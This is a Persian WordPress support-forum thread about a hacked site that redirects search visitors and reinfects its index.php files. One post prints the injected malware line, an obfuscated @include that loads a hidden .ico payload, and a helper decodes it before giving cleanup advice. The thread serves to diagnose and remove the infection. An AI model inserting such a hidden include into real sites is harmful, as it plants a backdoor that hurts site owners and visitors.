رفتن به مطلب

ریدایرکت وردپرس به صفحات ناشناخته

پست های پیشنهاد شده

سلام دوستان خسته نباشید . ببخشید من چند وقتیه که سایتم دچار مشکل شده و مشکلش هم این هست که وقتی از طریق گوگل کسی وارد سایت میشه به یک صفحه ناشناخته ریدایرکت میشه و کل بازدید سایت رو هم گرفته یه جایی گفتم بخاطر افزونه های غیر معتبره همه افزونه ها رو پاک کردم و همه رو از جاهای معتبر خریدم و درست نشد بازم گفتن بخاطر قالب هستش قالب رو دوباره نصب کردم و به چندجا دادم چک کردن مشکل قالب هم نبود حتی همه اطلاعات دیتابیس جز پست ها و اطلاعات ادمین رو پاک کردم بازم مشکل پا برجا بود وردپرس رو هم حذف کردم از اول نصب کردم و بازهم درست نشد خواستم اگه ممکنه راهنماییم کنید برای حل این مشکل فیلم مشکل رو هم پیوست میکنم خیلی ممنون میشم اگه راهنمایی کنید

لینک ها تنها برای اعضای سایت قابل نمایش است.

ویرایش شده توسط mohamadmk
غلط تایپی
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

درود.

طبق ویدیویی که گداشتید، کلمه "کرد سانگ" رو داخل گوگل جستجو کردم و به خوبی سایتتون باز شد. این کار رو با گوگل کروم و فایرفاکس تست کردم و مشکلی از لحاظ ریدایرکت ندیدم.

با این حساب کد مخربی داخل سایتتون وجود نداره.

این نوع ریدایرکت ها در نتیجه ی یک بدافزار یا کوکی یا جاوا اسکریپتی هست که داخل کامپیوتر شخصیتون وجود داره. گاهی اوقات سایت هایی که بازدید می کنید کوکی هایی رو داخل مرورگرتون ذخیره می کنند که باعث اینگونه خرابکاری ها میشن. یا فایل های جاوا اسکریپتی که در هنگام مشاهده وب سایت ها در مرورگرتون ذخیره میشن توانایی ریدایرکت کردن خودکار سایت ها رو دارند.

راه کارها :

1. کوکی مرورگر رو بطور کامل حذف کنید. پیشنهاد میشه از نرم افزار CCleaner استفاده کنید و تمامی کوکی ها و کش های مرورگرها رو پاک کنید.
  2. رجیستری کامپیوتر رو اسکن کنید. توسط همون نرم افزار CCleaner می تونید اینکارو انجام بدید.
  3. نرم افزارهای نصب شده روی کامپیوتر شخصیتون رو بررسی کنید و اونهایی که نمیدونید چی هستند رو پاک کنید.
  4. افزونه هایی که روی مرورگرتون نصب شده رو بررسی کنید و اونهایی که نمیدونید چی هستند رو پاک کنید.
  5. توسط یک آنتی ویروس آپدیت شده، کل سیستمتون رو اسکن کنید.
  6. تنظیمات مرورگر رو روی تنظیمات پیش فرض قرار بدید یا به اصطلاح Reset کنید.

اقدامات دیگه :

1. برای اینکه مطمئن بشید مشکل از سیستم خودتون هست یا سایت، می تونید سایتتون رو با مرورگر موبایل یا کامپیوترهای دیگه ای هم تست کنید.
  2. روی سایتتون افزونه Wordfence رو نصب کنید و کل سایتتون رو اسکن کنید تا هرگونه کد مخربی رو پیدا و حذف کنید.

به هر حال شخصا سایتتون رو با مرورگرهای گوگل کروم و فایرفاکس (روی لپ تاپ) و مرورگر سافاری (روی موبایل) تست کردم و هیچ مشکلی ندیدم.

خوشحال میشیم برای کسانی که این مشکل رو دارند، تجربیاتتون رو پس از اینکه مشکل رو حل کردید، در همین تاپیک به اشتراک بگذارید.

موفق باشید.

• Like 3
لینک به دیدگاه

در 47 دقیقه قبل، Masih گفته است :

درود.

طبق ویدیویی که گداشتید، کلمه "کرد سانگ" رو داخل گوگل جستجو کردم و به خوبی سایتتون باز شد. این کار رو با گوگل کروم و فایرفاکس تست کردم و مشکلی از لحاظ ریدایرکت ندیدم.

با این حساب کد مخربی داخل سایتتون وجود نداره.

این نوع ریدایرکت ها در نتیجه ی یک بدافزار یا کوکی یا جاوا اسکریپتی هست که داخل کامپیوتر شخصیتون وجود داره. گاهی اوقات سایت هایی که بازدید می کنید کوکی هایی رو داخل مرورگرتون ذخیره می کنند که باعث اینگونه خرابکاری ها میشن. یا فایل های جاوا اسکریپتی که در هنگام مشاهده وب سایت ها در مرورگرتون ذخیره میشن توانایی ریدایرکت کردن خودکار سایت ها رو دارند.

راه کارها :

1. کوکی مرورگر رو بطور کامل حذف کنید. پیشنهاد میشه از نرم افزار CCleaner استفاده کنید و تمامی کوکی ها و کش های مرورگرها رو پاک کنید.
  2. رجیستری کامپیوتر رو اسکن کنید. توسط همون نرم افزار CCleaner می تونید اینکارو انجام بدید.
  3. نرم افزارهای نصب شده روی کامپیوتر شخصیتون رو بررسی کنید و اونهایی که نمیدونید چی هستند رو پاک کنید.
  4. افزونه هایی که روی مرورگرتون نصب شده رو بررسی کنید و اونهایی که نمیدونید چی هستند رو پاک کنید.
  5. توسط یک آنتی ویروس آپدیت شده، کل سیستمتون رو اسکن کنید.
  6. تنظیمات مرورگر رو روی تنظیمات پیش فرض قرار بدید یا به اصطلاح Reset کنید.

اقدامات دیگه :

1. برای اینکه مطمئن بشید مشکل از سیستم خودتون هست یا سایت، می تونید سایتتون رو با مرورگر موبایل یا کامپیوترهای دیگه ای هم تست کنید.
  2. روی سایتتون افزونه Wordfence رو نصب کنید و کل سایتتون رو اسکن کنید تا هرگونه کد مخربی رو پیدا و حذف کنید.

به هر حال شخصا سایتتون رو با مرورگرهای گوگل کروم و فایرفاکس (روی لپ تاپ) و مرورگر سافاری (روی موبایل) تست کردم و هیچ مشکلی ندیدم.

خوشحال میشیم برای کسانی که این مشکل رو دارند، تجربیاتتون رو پس از اینکه مشکل رو حل کردید، در همین تاپیک به اشتراک بگذارید.

موفق باشید.

بله درسته یک ماهی هست که سایتم اینجوریه با افزونه Wordfence که سرچ میکنم یه سری کد ها توی فایل INDEX.PHPهستش تمامی فایل هایی که این نام رو دارند اون کد ها توشه ولی متاسفانه حذفش کردم دو ساعت پیش نمیدونم چه کدیه ولی دو سه روز یکبار اون کد میاد و باز هم ریدایرکت میکنه یک بار که سرچ کردم توی تموم فایل های وردپرس اون کد بود ولی جدیدا فقط توی فایل INDEX.PHP میزاره تا حالا صد بار حذفش کردم ولی بازم میاد

لینک به دیدگاه

در در 10 اردیبهشت 1397 در 20:48، mohamadmk گفته است :

بله درسته یک ماهی هست که سایتم اینجوریه با افزونه Wordfence که سرچ میکنم یه سری کد ها توی فایل INDEX.PHPهستش تمامی فایل هایی که این نام رو دارند اون کد ها توشه ولی متاسفانه حذفش کردم دو ساعت پیش نمیدونم چه کدیه ولی دو سه روز یکبار اون کد میاد و باز هم ریدایرکت میکنه یک بار که سرچ کردم توی تموم فایل های وردپرس اون کد بود ولی جدیدا فقط توی فایل INDEX.PHP میزاره تا حالا صد بار حذفش کردم ولی بازم میاد

@include "\x2fhom\x65/ko\x72dso\x6eg/p\x75bli\x63_ht\x6dl/w\x70-co\x6eten\x74/la\x6egua\x67es/\x70lug\x69ns/\x2ee11\x39274\x32.ic\x6f";

این تیکه کدی هست که خدمتتون عرض کردم

لینک ها تنها برای اعضای سایت قابل نمایش است.

لینک به دیدگاه

دیکد شده ی این کدی که فرمودید به شرح زیر هست :

<?  @include "/home/kordsong/public_html/wp-content/languages/plugins/.e1192742.ico";  ?>

ببینید چنین مسیری داخل فایل منیجرتون هست یا خیر.

ولی طبق این فایل که اینکلود شده، فرمت ico چیزی نیست که بتونه ریدایرکت انجام بده.

یکی از افزونه ها یا قالب های نال شدتون حاوی کد مخرب هستش که طبیعتا افزونه Wordfence نمی تونه تشخیصش بده . در چنین مواردی آنالیز کردن دستی کل سایت توسط یک متخصص می تونه بهتون کمک کنه.

همچنین پیشنهاد می کنم روی لوکال هاست یک وردپرس نصب کنید و قالبتون رو به همراه تمامی افزونه ها روی اون نصب کنید و تست کنید. اگه در حالت خام چنین کدهایی داخل قالب وجود ندارند، حتما توسط افزونه ها ساخته میشن. فایل functions.php قالب رو هم چک کنید و کدهای داخلش رو بررسی کنید که به سایت خارجی متصل نشده باشه.

مجددا سایتتون رو بررسی کردم مشکلی از لحاظ ریدایرکت ندیدم، یکی از احتمالات من، مشکل مرورگر خودتونه. طبق چیزی که گفتم با کامپیوتر دیگه یا موبایل هم تست کنید سایتتون رو که آیا چنین مشکلی در دیگر سیستم ها هست یا خیر.

• Like 3
لینک به دیدگاه

• 9 ماه پیش ...

اما بحث ریدایرکت شدن سایت به دلیل استفاده از افزونه و پوسته های نال جدی هست

سایتهایی که از پوسته یا افزونه نال که شش ماه پیش به بعد منتشر شده باشند استفاده کنند عملا به یکسری صفحات از پیش تعیین شده ریدایرکت خواهند شد که دارای محتوای تبلیغاتی و بعضا نامناسب هستند

حتی با فردی مواجه شدم که اخطار به دلیل داشتن محتوای نامناسب و غیر اخلاقی گرفته بود اما نمیدونست چرا بعد که تحقیق کردم دیدم اگر با اکانت مدیریت وارد وبسایت شوند عملا ریدایرکت اتفاق نمیوفته اما کاربران عادی به سایت های دیگه ریدایرکت می شوند

لینک به دیدگاه

مهمان
این موضوع برای عدم ارسال قفل گردیده است.
  • اضافه کردن...